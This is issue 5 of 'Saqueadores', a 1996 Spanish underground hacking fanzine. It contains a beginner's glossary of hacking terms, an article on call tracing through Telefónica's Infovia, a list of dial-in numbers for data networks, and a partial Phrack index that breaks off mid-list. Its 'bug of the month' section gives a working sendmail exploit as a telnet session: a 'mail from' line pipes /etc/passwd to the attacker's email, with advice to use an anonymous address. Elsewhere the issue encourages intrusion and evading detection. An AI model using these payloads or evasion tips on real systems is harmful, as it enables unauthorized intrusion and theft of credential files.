
ͻ
                       SAQUEADORES  N5  20-12-96                          
                             Segunda Epoca                                 
Ķ
                   Fanzine del underground informatico                     
ͼ

ͻ
  Division tecnica      Eljaker, Warezzman, El Duke de Sicilia,           
                        +Ochodedos...                                     
Ķ
  Colaboradores         SLinK, RoN, RedCool, Valfadir...                  
Ķ
  Division comercial    Ericx, Warezzman, Red...                          
͹
  Disponible en    http://www.geocities.com/SiliconValley/park/7574/      
                   http://iberhack.ml.org                                    
                   http://www.geocities.com/SiliconValley/Park/7479/      
͹
  E-mail    eljaker@hotmail.com       Irc    #hack, #iberhack, etc...   
            el_duke1@hotmail.com             En la red hispana de irc   
            warezzman@geocities.com                                     
ͼ




     "If you give a man a crack he'll be hungry again
     tomorrow, but if you teach him how to crack, he'll
     never be hungry again"

                                                  +ORC  




ͻ
 01. CONTENIDOS                                                            
ͼ


N__Titulo/Autor___________________________________Tema_________Nivel tecnico_

01. Contenidos                                     Saqueadores numero 5

02. Presentacion                                   Saqueadores numero 5

03. El bug del mes / por Red                       Hackin       Medio-alto

04. Curso de hacking empezando desde cero I        Hackin       Bajo
por Eljaker

05. Traceo de llamadas en infovia por el Duke      Telefonia    Medio-alto

06. Telefonos de algunas redes con numero en       Hackin
Espaa

07. Indice de la revista Phrack. #40-49            Publicaciones en ingles
por el Duke

08. Hackers, phreackers y piratas                  Opinion

09. Avisos, peticiones, etc...                     Variado

10. Ser o no ser un hacker?                       Opinion

11. Despedida                                      Taluego Lucas




ͻ
 02. PRESENTACION                                                          
ͼ


Hola amigos soy el Duke de Sicilia. Eljaker esta un poco liado ultimamente, 
por eso me han encargado que cordine temporalmente el fanzine. Ademas de este 
han ocurrido otros cambios.

Como habreis notado, el look de la revista ha cambiado bastante. Tenemos
nuevos colaboradores y articulistas.

Hemos decidido que la revista tendra un caracter democratico, por lo tanto
la figura de editor-jefe desaparece, ahora somos un equipo donde nadie
manda.

Vamos a incluir articulos ideologicos y de opinion. (No os preocuipeis, no
pretendemos transformar el fanzine en un folletin politico) Aunque los hackers
y crackers pertenezcamos al undergroung, no podemos olvidarnos de lo que
pasa hay fuera, el mundo cambia muy deprisa y debemos estar preparados
para los cambios, y si es necesario, nosotros mismos nos veremos obligados
ha hacer esos cambios.

Hay otros cambios menos obvios, de los que ya os ireis dando cuenta poco
a poco.

                                                          el duke de sicilia




ͻ
 03. EL BUG DEL MES                                                        
ͼ


Hola soy el Red Cracker y me han encargado que escriba esta nueva seccion de
la revista. (Solo en este numero) La verdad es que mi especialidad no es el 
hacking por eso el bug del que voy a hablar no es muy espectacular. Ademas es 
un poco antiguo con lo que seguramente no funcionara en la mayoria de las 
maquinas.

Lo que hace este bug, es permitir que enviando un comando en la linea
del sendmail puedas conseguir que el fichero de passwords sea enviado
a tu direccion de correo. (Por eso es conveniente usar una direccion
anonima para no ser pillado)

------------------------------------------------------------------------------

Sistemas: Unix's en general, espacialmente AIX y SUNOS 
Versiones: Sendmail, versiones anteriores a la 5.57
Descripcion: Bug del sendmail
Ejemplo: en unix o linux

 saqland % telnet victima.com 25 
 Trying 128.128.128.1...
 Connected to victima.com  
 Escape character is '^]'.
 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
 rcpt to: loquequieras
 550 loquequieras... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 saqland %


Ejemplo: Conexion desde DOS o Windows y otros

 Con un programa de telnet conecta a este url -> victima.com:25
 o si se puede configurar en los menus configuralo para que la
 conexion se haga al puerto 25, que es el del sendmail.
 
 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
 rcpt to: loquequieras
 550 loquequieras... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit


Notas:
-victima.com = nombre del ordenador a hackear
-saqland = nombre de nuestro ordenador
-Lo que aparece con un numero delante son mensajes de nuestra victima, 
el resto es lo que tienes que escribir.
-Aprende a usar bien el programa de telnet, porque es el que mas usaras a la
hora de hackear.

------------------------------------------------------------------------------

                                                                        Red

 


ͻ
 04. CURSO DE HACKING EMPEZANDO DESDE CERO I                               
ͼ


Hola amigos, bienvenidos al maravilloso mundo del hacking. Como estas leyendo
esto supongo que tendras muy pocos conocimientos sobre hacking, por eso
voy a intentar escribir de la forma mas clara que pueda, aun asi, si os
perdeis no teneis mas que mandarme un mensaje y me correjire. Los que
esten leyendo esto tambien, pero tengan un poco mas de nivel, pueden 
seguir leyendo, nunca viene mal repasar los conocimientos basicos.


Conceptos basicos:
------------------

Como cualquier aburrido manual de iniciacion que se precie, ahora vienen
las definiciones basicas que todo hacker debe saber. Estas definicones,
no vienen en ningun diccionario y son muy subjetivas y cambientes,
cada uno las interpreta a su manera y su significado varia con el tiempo
o segun el contexto. Voy a intentar dar la definicon mas extendida, e
intentare explicar todos los posibles significados y variantes:

HACKING >> Penetrar en sistemas informaticos ajenos sin su consentimiento, 
tanto "virtualmente" como fisicamente. (Ej. Entrar en una oficina y robar 
unos manuales) 
>> Cualquier accion encaminada a conseguir lo primero; como son
la ingenieria social, el trashing, etc...

HACKER >> Persona que hace hacking.
>> Persona muy habil con los ordenadores.
>> Pirata informatico, en cualquiera de sus muchos significados.

PIRATA INFORMATICO >> Persona dedicada a la copia y distribucion de
software ilegal, tando software comercial crackeado, como shareware
registrado, etc...
>> Persona que elimina las protecciones software. Mas conocido como
cracker.
>> Delincuente informatico.

CRACKER >> Persona que elimina las protecciones logicas y a veces
fisicas del software.
>> Hacker malvado.
>> Hacker que emplea la fuerza bruta, o metodos que daan el sistema
que intenta hackear.

CRACKEADOR >> Programa utilizado para sacar los password encriptados
de los archivos de passwords. Bien desencriptandolos, cuando se puede,
o bien provando multiples convinaciones hasta que encuentra la
correcta.

INGENIERIA SOCIAL >> Convencer a alguien, por diversos medios, para que 
nos facilite informacion util para hackear, o para que haga algo que 
nos beneficie. (No solo al hackear)

TRASHING >> (Recogida de basura) Rebuscar en la basura, para encontrar algo 
que pueda ser util a la hora de hackear.

HACKEAR POR FUERZA BRUTA >> No significa nada bestia, ni que necesite mucha
fuerza, simplemente es un hacking que necesita mucho esfuerzo,
mucho tiempo de proceso o de intentos. Como es probar distintos passwords 
hasta encontrar el acertado, usar un crackeador, desencriptar
un fichero encriptado, sacar las claves de un archivo de passwords
usando las palabras de un diccionario, etc..

FICHERO DE PASSWORD >> Fichero en el que el sistema guarda sus claves de 
acceso.

CARDING >> Uso ilegitimo de las tarjetas de credito, o sus numeros,
pertenecienes a otras personas. Se relaciona mucho con el hacking,
porque para conseguir numeros de tarjetas de creditos, una de las
mejores maneras es el hacking.

PHREAKING >> Uso del telefono, o de las redes y servicios telefonicos,
gratis o con un coste menor del normal. Devido al uso intensivo del
telefono por parte de los hackers, es bastante normal que usen el
phreackin para ahorrarse unas pelas.
>> Modificacion o intervencion de las lineas telefonicas, con otros
fines distintos del llamar gratis.

BOXING >> Uso de aparatos electronicos o electricos (Boxes) para
hacer phreacking.

CABALLOS DE TROYA >> Programa que se queda residente en el sistema
que pretendemos hackear y que nos facilita informacion sobre lo que
pasa en el.
>> Un tipo de virus o programa que usa otros programas para introducirse
en sistemas ajenos. (Que me perdonen por la definicon tan cutre, los 
expertos en virus)

PINCHADO DE LINEAS / SNIFFING >> Espiar y obtener la informacion que
cicula por una red. 

SNIFFER >> Programa encargado de intercepatar la informacion que circula
por la red.

TRACEAR >> Seguir la pista a traves de la red a una informacion o a una
persona.

BUG, AGUJERO, HOLE >> Defecto del software que permite a los hackers
introducirse en ordenadores ajenos.

EXPLOIT >> Metodo concreto de usar un bug para entrar en un sistema.

WAR DIALER, DISCADOR >> Programa que escanea la linea telefonica en
busca de modems.

PPP, TCP/IP, UDP >> Distintos protocolos de comunicacion, que usan las
grandes redes como internet.

SUNOS, AIX, HP/UX, IRIX, VMS, UNIX >> Varios sistemas operativos que usan
los grandes ordenadores.

ADMINISTRADOR, SYSOP, ROOT >> Persona que se encarga del mantenimiento
de un sistema informatico, generalmente tienen control total sobre el
sistema.

BACKDOOR >> Puerta trasera, mecanismo en el software que permite entrar
evitando el metodo normal.

CORTAFUEGO, FIREWALL, BASTION >> Sistema avanzado de seguridad que
impide a personas no acreditadas el acceso al sistema.

LOGIN--> Procedimiento de entrar en un sistema.


Normas basicas del hacker:
--------------------------

Para terminar este primer capitulo voy a dar, tambien algo aburrido
y muy repetido por todos los manuales de iniciacion, pero es que es
algo imprescindible. Codigo etico y de comportamiento del hacker.

1. Nunca daes algo intencionadamente. Lo unico que conseguiras sera 
buscarte problemas.
2. Modifica solo lo estrictamente necesario para entrar y para evitar
ser localizado, o para poder acceder otras veces.
3. No hackees nunca por venganza ni por intereses personales o economicos.
4. No hackees sistemas pobres que no puedan reponerse de un ataque
fuerte. Ni tampoco sistemas muy ricos o grandes que puedan permitirse
gastar dinero y tiempo en buscarte.
5. Odia a telefonica pero no te metas con ella.
6. No hackees ordenadores del gobierno. (El gran hermano te observa) Tal vez 
sean mas emocionantes, pero no olvides que la policia trabaja para ellos.
7. No comentes con nadie, a menos que sea de total confianza, tus
azaas. (Los mas grandes hackers de la historia han sido cazados
debido a las confesiones de sus novias)
8. Cuando hables en bbs o por internet, procura ser lo mas discreto
posible. Todo lo que digas quedara almacenado.
9. Se paranocio. Una da las caracteristicas principales de los mejores
hackers es la paranoia.
10. No dejes ningun dato que pueda relacionarse contigo, en los ordenadores
que hackees. Y si es posible, ni siquiera "firmes".
11. Estudia mucho antes de lanzarte a la practica. En el proximo numero
de esta serie hablare de los lugares mas seguros para empezar, pero mientras 
tanto, ten en cuenta que eres un total novato, si te encuentras con
problemas probablemente, tu aventura acabe antes de empezar.
12. Nunca dejes de estudiar y de aprender nuevas cosas, el mundo de
la informatica avanza rapidamente, y es necesario mantener un buen
ritmo si no quieres quedarte atras.

Algunos de estos consejos te pareceran anticuados y estupuidos, pero la
mayoria tienen un doble objetivo. Mantener limpio el maltratado nombre
de los hackers y evitarte problemas con la justicia.

                                                                eljaker




ͻ
 05. TRACEO DE LLAMADAS EN INFOVIA                                         
ͼ


Los rumores se han confirmado, nos temiamos algo asi de telefonica, pero
la realidad supera la ficcion. Con un endiablado sistema, el gran hermano
nos tiene cogido por los mismisimos.

Ya lo avisabamos en el numero anterior, conociendo nuestra ip* en internet
cualquiera puede averiguar el telefono desde donde llamamos. Se acabo el
anonimato en internet y peor aun, se acabo el hacking seguro en internet.

El proceso es el siguiente, cualquiera con el que te conectes en internet
sabra tu direccion ip, con esta direccion se dirige a tu proveedor. En
teoria los datos que tiene el proveedor sobre ti son anonimos, pero hay
muchas maneras de conseguirlos. Una vez encontrado tu servidor, averiguan
que cuenta es la que estas usando, y ya te han pillado.

Muchos pensaran, "pues yo uso una cuenta hackeada y nunca me pillarian".
Grave error. Aqui es donde esta la verdadera putada de telefonica.
Segun hemos averiguado por fuentes fiables, al conectar con tu
servidor por infovia, a tu proveedor no solo le llegan tu login y
tu password, sino que tambien se envia tu caller-id*, conociendo tu 
caller-id conocen el numero del telefono desde el que llamas y entonces te 
localizan sin remedio.

Ademas de este control, telefonica ha colocado aun mas paranoicos,
controles de seguridad en infovia, como contabilizacion de las veces
que llamas en un dia, impiden el acceso libre entre servidores en
infovia obligando a pasar por sus menus, etc...

La mayoria creen en el anonimato en internet, pero esto es una burda
mentira, el anonimato no existe, porque el gran hermano te esta observnado.


NOTAS TECNICAS:
---------------

*IP-->Es tu direccion en una red tcp-ip*, y es necesaria para el
intercambio de datos.

*TCP-IP-->La red internet funciona bajo el protocolo de comunicacion
tcp-ip, este protocolo se basa en envios de paquetes de datos, desde el
servidor hasta el cliente. Devido a esta estructura, con cualquier
ordenador que te conectes, intercambiaras paquetes, y para que esos 
paquetes puedan llegar a su destino, ambos deben conocer la ip, del
otro, con lo cual es muy dificil quedar en anonimato, a menos que uses
un tipo de ip-spoofing*.

*IP-SPOOFING-->Es una tecnica, por la cual, el ordenador con el que estas
conectado no conoce tu verdadera ip, sino que recibe otra. Se ha mitificado
mucho, y en realidad tampoco es nada raro. (Aunque si es dificil hacerlo)
Por ejemplo, usar un proxy, es un tipo de ip-spoofing, ya que los ordenadores
con los que conectes a traves del proxy, recibiran la ip, de este y no la
tuya.

*CALLER-ID-->Es la informacion sobre tu llamada, que recibe la persona
a la que estas llamando. Contiene la informacion de tu area (la centrlaita* 
que te corresponde) y el numero de telefono desde donde llamas. Si el
telefono al que llamas esta preparado para detectar tu caller-id, ese
numero aparecera en su display incluso antes de descolgar. (Los que 
tengan un modelo moderno de telefono movil, sabran de que hablo)
Con lo cual se acabo tu anonimato. Parece ser que los ordenadores de
infovia, estan preparados para pasar esta informacion, automaticamnte
a tu servidor. Esto en teoria sirve para evitar las estafas a los proveedores
y que mas de una persona use la misma cuenta, pero esto es una excusa.
Varios de nosotros hemos comprobado que en la mayoria de los servidores
(arrakis, ctv, etc...) es posible que varias personas a la vez puedan
usar la misma cuenta, sin preocuparse. En realidad este sistema es otra
de las estrategias de telefonica para coartar nuestra libertad y nuestro
anonimato.

*CENTRALITA--> Mas o menos cuando haces una llamada pasa esto:
1. Descuelgas y marcas un numero.
2. Tu centralita, recibe este numero y dependiendo de varias cosas, como 
son el prefijo que hayas marcado, el tipo de llamada*, el tipo de
centralita*, etc... establecera una conexion u otra. En este ejemplo, vamos a 
suponer que la centralita conecta directamnete con la centralita de la 
persona a la que llamas y le envia el numero de la persona y tu caller-id.
3. Esta segunda centralita manda las seales de llamada a su telefono, y
tu caller-id. (Inlcuso antes de descolgar el telefono saben quien llama)
4. La persona descuelga el telefono y la conexion se establece.

*TIPO DE LLAMADA--> Si la llamada es interproviancial o internacional, tu 
llamada pasara por una o varias centralitas intermedias mas, y si tu 
centralita coincide con la del llamado no es necesario pasar por
otra centalita. (Esto se nota mucho, porque la llamada es muy rapida
y porque el volumen se oye mas alto que el normal)

*TIPOS DE CENTRALITAS--> Hay varios modelos de centralitas, pero para
simplificar vamos a agruparlos en dos tipos: 
a) Las centralitas analogicas, estas son las mas antiguas y progresivamente
las van cambiando por las nuevas. Estas centralitas se reconocen, porque
la marcacion es por pulsos (La que usaban los telefonos antiguos en los
que habia que girar con el dedo una rueda numerada, y cada numero suena 
como un tictictictic)
Aunque hay algunas centralitas analogicas que tambien aceptan marcacion
por tonos. Debido a la antigua tecnologia de estas centralitas, la
informacion sobre el caller-id, no se envia, aun asi, es relativamnte
facil tracear la llamada.
b) Centralitas digitales, estas son mas nuevas, y se reconocen porque
la maracion se realiza por tonos. (La tipica marcacion, en la que a cada
numero le corresponde un solo bip) Estas centralitas son de tecnologia mas
moderna y ademas de enviar tu caller-id, tambien hacen un completo
registro de tu llamada, con lo cual, aunque la persona no disponga de
display para ver el caller-id, puede llegar a ti sin muchos problemas.
Permiten todos los servios nuevos que ha creado telefonica, como
el devios de llamadas, la llamada a tres, la llamada anonima*, etc...

*LLAMADA ANONIMA--> Uno de los nuevos servicios de telefonica, es la
posibilidad de evitar que tu caller-id sea enviado, mediante la marcacion
de un codigo especial antes de llamar. Este codigo esta siendo investigado
por nuestro equipo y posiblemente sea el sujeto de uno de nuestros nuevos
expedientes secretos. Aun asi, el telefono al que llameis puede que
no acepte llamadas anonimas, con lo que el truco no servira.


La conclusion es que hay que andarse con mucho cuidado de ahora en adelante,
con lo que se hace en internet. Como decia un famoso hacker:
"Solo los hackers paronicos consiguen continuar cuando han cumplido mas de 
21 aos"

                                                        el duke de sicilia




ͻ
 06. TELEFONOS DE ALGUNAS REDES CON NUMERO EN ESPAA                       
ͼ


Los lugares calsicos de hackeo son las grandes redes, por eso he recopilado
en este articulo, los numeros de las redes mas importantes que ofrecen
sus servicios en nuestro pais. Son pocas comparadas con las que operan en
Estados unidos, pero algo es algo.


Nodo  | Ciudad     | Terminal  | BPS   | Numero      | Red
-----------------------------------------------------------------
6670  | BARCELONA  | E71       | 2400  | (93)4155082 | TYMNET
      | BARCELONA  | E71       | 9600  | (93)4156518 | TYMNET
6726  | BILBAO     | E71       | 2400  | (94)4276492 | TYMNET
06726 | BILBAO     | E71       | 9600  | (94)4411500 | TYMNET
13643 | MADRID     | E71       | 2400  | (91)3026006 | TYMNET
      | MADRID     | E71       | 9600  | (91)3830918 | TYMNET
04535 | MADRID     | E71       | 9600  | (91)7661144 | TYMNET
      | TODAS      | E71       | 9600  | 047         | IBERPAC
      | TODAS      | E71       | 9600  | 048         | IBERPAC
      | TODAS      | E71       | 14400 | 041         | IBERPAC
      | TODAS      | E71       | 14400 | 042         | IBERPAC
      | BILBAO     | E71       | 1200  | (94)4419262 | IBERPAC
      | MADRID     | E71       | 1200  | (91)4582241 | IBERPAC
      | TODAS      | E71       | 2400  | 090         | DATAPAC
      | MADRID     | E71       | 2400  | (91)3591951 | COMPUSERVE
      | BARCELONA  | E71       | 2400  | (93)4123282 | COMPUSERVE
      | BILBAO     | 8N1 VT100 | 1200  | (94)4209444 | SPRITEL
      | BILBAO     | 8N1 VT100 | 1200  | (94)5134048 | SPRITEL
      | BILBAO     | 8N1 VT100 | 1200  | (94)3470044 | SPRITEL
      | TODAS      | PPP       | 28800 | 050         | INFOVIA
      | TODAS      | CEPT-1    | 9600  | 030         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 031         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 032         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 033         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 034         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 035         | IBERTEX
      | TODAS      | CEPT-1    | 2400  | 036         | IBERTEX


Observaciones:

-A ver quien consigue conectar decentemente con el 090, lo hemos
intentado de infinidad de maneras y nada.  :-?

-Aunque algunas redes parezcan muy poco propicias para el hacking,
esto solo es una apariencia.
#Por ejemplo ibertex es un sitio ideal (Aunque caro) de empezar
a hackear. Tiene un sistema de seguridad muy escaso y antiguo,
cualquier hacker que se precie puede conseguir algo.
#Infovia, al ser un sistema nuevo, tambien es facil de hackear, ya
que tiene muchos agujeros inexplorados. Aunque andaros con cuidado,
que jugar con la telefonica es peligroso. (El gran hermano te observa)

-Algunos datos estan ya anticuados, y otros no han sido comprobados,
por favor que alguien compruebe los datos y nos envie los resulatados
actualizados. Esto de vivir lejos de las grandes ciudades es un poco
molesto a la hora de divertirse. :-)


AVISO: La mayoria de estas redes tienen fuertes medidas de seguridad,
a si que llevaros cuidado. Aunque su hackeo este muy bien documentado
como en el caso de la red datapac o la red tymnet, estos numeros
de telefono tienen activado la deteccion del caller-id, esto quiere decir
que nada mas llamar saben el numero del telefono desde el que estais
llamando. A menos que useis un telefono realmente limpio, os aconsejaria que
os andaseis con cuidado.

PETICION: Si alguien conoce el numero de telefono de otras redes, que por
favor, nos los envie, para que podamos publicarlo en un proximo numero.




ͻ
 07. Indice de la revista Phrack. Numeros 40 al 49                         
ͼ


Aunque nuestra publicacion es en espaol, no podemos olvidar a Phrack la
revista electronica sobre hacking en ingles mas famosa del mundo (Despues
de la nuestra :-) y la que muchos piensan
que es la mejor. Por eso hemos decidido hacer un indice de los numeros mas
actuales, los ultimos 9 numeros aparecidos de esta revista.


Datos sobre la revista:
-----------------------

Phrack Magazine
603 W. 13th #1A-278              (Direccion de correo)
Austin, TX 78701

ftp.fc.net                       (FTP)
/pub/phrack

http://www.fc.net/phrack         (WWW)

phrack@well.com                  (Direccion e-mail)


Indice:
-------
* Los articulos con un asterisco son de recomendada lectura. (Cortesia
de el duke)


                              -= Phrack 40 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by Dispater                                               06K
 2. Phrack Loopback by Dispater and Mind Mage                              50K
 3. Phrack Pro-Phile on Lex Luthor by Taran King                           36K
 4. Network Miscellany by The Racketeer [HFC]                              32K
 5. Pirates Cove by Rambone                                                57K
 6  Cellular Telephony, Part II by Brian Oblivion *                       72K
 7. The Fine Art of Telephony by Crimson Flash *                           65K
 8. BT Tymnet, Part 1 of 3 by Toucan Jones                                 57K
 9. BT Tymnet, Part 2 of 3 by Toucan Jones                                 55K
10. BT Tymnet, Part 3 of 3 by Toucan Jones                                 91K
11. SummerCon 1992 by Knight Lightning and Dispater                        35K
12. PWN/Part 1 by Datastream Cowboy                                        50K
13. PWN/Part 2 by Datastream Cowboy                                        48K
14. PWN/Part 3 by Datastream Cowboy                                        48K
                                                                   Total: 702K


                              -= Phrack 41 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by Dispater                                               07K
 2. Phrack Loopback by Dispater and Mind Mage                              52K
 3. Phrack Pro-Phile on Supernigger                                        10K
 4. Network Miscellany by The Racketeer [HFC]                              35K
 5. Pirates Cove by Rambone                                                32K
 6  Hacking AT&T System 75 by Scott Simpson                                20K
 7. How To Build a DMS-10 Switch by The Cavalier                           23K
 8. TTY Spoofing by VaxBuster *                                            20K
 9. Security Shortcomings of AppleShare Networks by Bobby Zero             16K
10. Mall Cop Frequencies by Caligula XXI                                   11K
11. PWN/Part 1 by Datastream Cowboy                                        46K
12. PWN/Part 2 by Datastream Cowboy                                        49K
13. PWN/Part 3 by Datastream Cowboy                                        43K
                                                                   Total: 364K


                                -= Phrack 42 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             14K
 2. Phrack Loopback / Editorial Page / Line Noise                          48K
 3. Phrack Pro-Phile on Lord Digital                                       22K
 4. Packet Switched Network Security by Chris Goggans                      22K
 5  Tymnet Diagnostic Tools by Professor Falken                            35K
 6. A User's Guide to XRAY by NOD                                          11K
 7. Useful Commands for the TP3010 Debug Port by G. Tenet                  28K
 8. Sprintnet Directory Part I by Skylar                                   49K
 9. Sprintnet Directory Part II by Skylar                                  45K
10. Sprintnet Directory Part III by Skylar                                 46K
11. Guide to Encryption by The Racketeer [HFC]                             32K
12. The Freedom Of Information Act and You by Vince Niel                   42K
13. HoHoCon from Various Sources                                           51K
14. PWN by Datastream Cowboy                                               29K
                                                                  Total:  474K       


                                -= Phrack 43 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             24K
 2. Phrack Loopback Part I                                                 38K
 3. Phrack Loopback Part II / Editorial                                    44K
 4. Line Noise Part I                                                      39K
 5. Line Noise Part II                                                     43K
 6. Phrack Pro-Phile on Doctor Who                                         15K
 7. Conference News Part I by Various Sources                              53K
 8. Conference News Part II by Various Sources                             58K
 9. How To Hack Blackjack (Part I) by Lex Luthor                           52K
10. How To Hack Blackjack (Part II) by Lex Luthor                          50K
11. Help for Verifying Novell Security by Phrack Staff *                   48K
12. My Bust (Part I) by Robert Clark *                                     56K
13. My Bust (Part II) by Robert Clark *                                    55K
14. Playing Hide and Seek, Unix Style by Phrack Accident                   31K
15. Physical Access and Theft of PBX Systems by Co/Dec                     28K
16. Guide to the 5ESS by Firm G.R.A.S.P. *                                 63K
17. Cellular Info by Madjus (N.O.D.) *                                     47K
18. LODCOM BBS Archive Information                                         24K
19. LODCOM Sample Messages                                                 52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace                     21K
21. Acronyms Part I by Firm G.R.A.S.P.                                     50K
22. Acronyms Part II by Firm G.R.A.S.P.                                    51K
23. Acronyms Part III by Firm G.R.A.S.P.                                   45K
24. Acronyms Part IV by Firm G.R.A.S.P.                                    52K
25. Acronyms Part V by Firm G.R.A.S.P.                                     46K
26. International Scene by Various Sources                                 51K
27. Phrack World News by Datastream Cowboy                                 24K
                                                                  Total: 1152K


                                -= Phrack 44 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             16K
 2. Phrack Loopback / Editorial                                            57K
 3. Line Noise Part I                                                      51K
 4. Line Noise Part II                                                     35K
 5. Computer Cop Prophile by The Grimmace                                  22K
 6. Conference News Part I by Various Sources                              55K
 7. Conference News Part II by Various Sources                             35K
 8. Conference News Part III by Various Sources                            50K
 9. Intro to Packet Radio by Larry Kollar *                                16K
10. The Moeller Papers                                                     30K
11. Sara Gordon v. Kohntark Part I                                         12K
12. Sara Gordon v. Kohntark Part II                                        47K
13. Northern Telecom's FMT-150B/C/D by FyberLyte                           16K
14. A Guide to Data General's AOS/VS Part I by Herd Beast                  46K
15. A Guide to Data General's AOS/VS Part II by Herd Beast                 50K
16. An Interview With Agent Steal by Agent 005                             14K
17. Visionary - The Story About Him by Visionary                           23K
18. Searching The Dialog Information Service by Al Capone                  48K
19. Northern Telecom's SL-1 by Iceman                                      30K
20. Safe and Easy Carding by VaxBuster                                     18K
21. Datapac by Synapse                                                     36K
22. An Introduction to the Decserver 200 By Opticon                        16K
23. LOD Communications BBS Archive Information                             29K
24. MOD Family Portrait                                                    35K
25. Gail Takes A Break                                                     49K
26. International Scenes by Various Sources                                25K
27. Phrack World News by Datastream Cowboy                                 22K
                                                                 Total:   882K


                                 -= Phrack 45 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             17K
 2. Phrack Loopback Part I                                                 31K
 3. Phrack Loopback Part II / Editorial                                    40K
 4. Line Noise Part I                                                      49K
 5. Line Noise Part II                                                     50K
 6. Line Noise Part III                                                    59K
 7. Phrack Prophile on Control C                                           22K
 8. Running a BBS on X.25 by Seven Up                                      15K
 9. No Time for Goodbyes by Emmanuel Goldstein                             21K
10. Security Guidelines *                                                  55K
11. Ho Ho Con Miscellany by Various Sources                                32K
12. Quentin Strikes Again by The Omega and White Knight                    28K
13. 10th Chaos Computer Congress by Manny E. Farber                        23K
14. Defcon II information                                                  26K
15. VMS Information by Various Sources                                     34K
16. DCL BBS PROGRAM by Raoul                                               23K
17. Hollywood-Style Bits & Bytes by Richard Goodwin                        50K
18. Fraudulent Applications of 900 Services by Co/Dec                      15K
19. Screwing Over Your Local McDonald's by Charlie X                       20K
20. The Senator Markey Hearing Transcripts                                 72K
21. The Universal Data Converter by Maldoror                               45K
22. BOX.EXE - Box Program for Sound Blaster by The Fixer                   13K
23. Introduction To Octel's ASPEN by Optik Nerve                           12K
24. Radio Free Berkeley Information                                        35K
25. The MCX7700 PABX System by Dr. Delam                                   22K
26. Cellular Debug Mode Commands by Various Sources *                      13K
27. International Scenes by Various Sources                                63K
28. Phrack World News by Datastream Cowboy                                 17K
                                                                 Total:   902K


                                 -= Phrack 46 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             17K
 2. Phrack Loopback / Editorial                                            52K
 3. Line Noise                                                             61K
 4. Line Noise                                                             56K
 5. Phrack Prophile on Minor Threat                                        12K
 6. Paid Advertisement                                                     62K
 7. Paid Advertisement (cont)                                              45K
 8. The Wonderful World of Pagers by Erik Bloodaxe                         24K
 9. Legal Info by Szechuan Death                                           13K
10. A Guide to Porno Boxes by Carl Corey                                   13K
11. Unix Hacking - Tools of the Trade by The Shining                       42K
12. The fingerd Trojan Horse by Hitman Italy *                             32K
13. The Phrack University Dialup List                                      12K
14. A Little About Dialcom by Herd Beast                                   29K
15. VisaNet Operations Part I by Ice Jey                                   50K
16. VisaNet Operations Part II by Ice Jey                                  44K
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam              25K
18. Startalk by The Red Skull                                              21K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau                  45K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau                 42K
21. The Groom Lake Desert Rat by PsychoSpy                                 44K
22. HOPE by Erik Bloodaxe                                                  51K
23. Cyber Christ Bites the Big Apple by Winn Schwartau                     60K
24. The ABCs of Better Hotel Staying by Seven Up                           12K
25. AT&T Definity System 75/85 by Erudite                                  13K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher                            35K
27. International Scenes by Various Sources                                44K
28. Phrack World News by Datastream Cowboy                                 38K
                                                             Total:       996K


                                 -= Phrack 47 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                                             16K
 2. Phrack Loopback / Editorial                                            52K
 3. Line Noise                                                             59K
 4. Line Noise                                                             65K
 5. The #hack FAQ (Part 1) by Voyager *                                    39K
 6. The #hack FAQ (Part 2) by Voyager *                                    38K
 7. The #hack FAQ (Part 3) by Voyager *                                    51K
 8. The #hack FAQ (Part 4) by Voyager *                                    47K
 9. DEFCon Information                                                     28K
10. HoHoCon by Netta Gilboa                                                30K
11. HoHoCon by Count Zero                                                  33K
12. HoHo Miscellany by Various Sources                                     33K
13. An Overview of Prepaid Calling Cards by Treason                        29K
14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage      25K
15. Complete Guide to Hacking Meridian Voice Mail by Substance             10K
16. DBS Primer from American Hacker Magazine                               45K
17. Your New Windows Background (Part 1) by The Man                        39K
18. Your New Windows Background (Part 2) by The Man                        46K
19. A Guide To British Telecom's Caller ID Service by Dr. B0B              31K
20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx                   13K
21. International Scenes by Various Sources                                40K
22. Phrack World News by Datastream Cowboy                                 38K
                                                        Total:            808K


                                 -= Phrack 48 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by the Editorial Staff                                    13K
 2. Phrack Loopback / Editorial                                            55K
 3. Line Noise (Part I)                                                    63K
 4. Line Noise (Part II)                                                   51K
 5. Phrack Pro-Philes on the New Editors                                   23K
 6. Motorola Command Mode Information by Cherokee *                        38K
 7. Tandy / Radio Shack Cellular Phones by Damien Thorn                    43K
 8. The Craft Access Terminal by Boss Hogg                                 36K
